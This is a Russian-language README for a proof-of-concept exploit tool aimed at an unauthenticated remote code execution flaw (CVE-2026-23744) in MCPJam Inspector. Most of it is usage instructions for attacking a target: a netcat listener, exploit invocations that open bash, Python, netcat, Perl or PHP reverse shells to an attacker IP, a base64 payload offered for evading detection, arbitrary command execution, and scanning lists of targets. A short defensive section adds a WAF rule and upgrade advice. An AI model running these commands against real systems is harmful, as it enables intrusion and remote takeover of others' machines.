
PoC-эксплойт для CVE-2026-23744 — уязвимость удаленного выполнения кода (RCE) в MCPJam Inspector. Инструмент демонстрирует дефект безопасности в версиях <=1.4.2 и помогает исследователям безопасности проверять исправления. Только для авторизованного тестирования и образовательных целей. Включает несколько вариантов полезной нагрузки, выполнение команд и управление сеансами.
Этот инструмент предназначен ТОЛЬКО для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование незаконно. Пользователи несут полную ответственность за свои действия.
Этот репозиторий содержит доказательство концепции эксплуатации CVE-2026-23744 — уязвимости неаутентифицированного удаленного выполнения кода (RCE), обнаруженной в MCPJam Inspector версий <=1.4.2. Уязвимость имеет критический показатель CVSS 9.8, что указывает на высокую степень риска с сетевым вектором атаки.
Инструмент эксплуатации предлагает широкий набор функций, предназначенных для эффективного тестирования безопасности:
Чтобы настроить инструмент эксплуатации, выполните следующие шаги:
Клонируйте репозиторий:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Установите зависимости:
pip install -r requirements.txt
Для запуска базовой эксплуатации сначала настройте слушатель, затем выполните скрипт эксплойта:
# Запуск слушателя
nc -lvnp 4444
# Запуск эксплойта
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Выполнение отдельных команд или команд из файла:
# Выполнение одной команды
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Выполнение команд из файла
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Используйте различные типы полезных нагрузок для разных сценариев:
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Полезная нагрузка в кодировке Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Сканирование нескольких целей на уязвимость:
# Создание файла с целями
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Сканирование уязвимых целей
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Изучите расширенные функции, такие как снятие отпечатков, использование прокси, подробный режим и автоматическая настройка слушателя:
# С отпечатками
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# С прокси
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Подробный режим
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Авто-слушатель
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
[+] Запуск улучшенного эксплойта против http://192.168.1.100:8080
[+] Reverse shell на 10.0.0.5:4444
[*] ID сессии: AbCdEfGh
[*] Снятие отпечатков цели...
[+] ОС цели: Ubuntu
[+] Доступные возможности: python3, perl, nc
[*] Выполнение эксплойта...
[+] Эксплойт успешен!
[!] Проверьте ваш netcat слушатель на 10.0.0.5:4444
Для защиты от CVE-2026-23744 необходимо предпринять следующие немедленные действия:
POST к /api/mcp/connect.Пример правила Nginx WAF для блокировки распространенных вредоносных шаблонов:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
Вопрос: Это легально в использовании?
Ответ: Этот инструмент легален только для использования на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
Вопрос: Какие системы уязвимы?
Ответ: Уязвимы версии MCPJam Inspector <=1.4.2.
Вопрос: Как я могу защитить свои системы?
Ответ: Немедленно обновитесь до версии MCPJam Inspector >1.4.2.
Sudeepa Wanigarathna
Несанкционированное использование этого инструмента незаконно и может привести к серьезным последствиям, включая:
Сделано с ❤️ от Sudeepa Wanigarathna
| Атрибут | Детали |
|---|
| CVE ID | CVE-2026-23744 |
| Уязвимость | Неаутентифицированное удаленное выполнение кода |
| Затронутые версии | <=1.4.2 |
| Оценка CVSS | 9.8 (Критическая) |
| Вектор атаки | Сеть |
| Тип | Команда | Лучше всего подходит для |
|---|
bash | Bash reverse shell | Большинство систем Linux |
python | Python3 reverse shell | Системы с установленным Python |
nc | Netcat reverse shell | Системы с netcat |
perl | Perl reverse shell | Системы с установленным Perl |
php | PHP reverse shell | Системы с установленным PHP |
base64 | Base64 encoded | Обход обнаружения |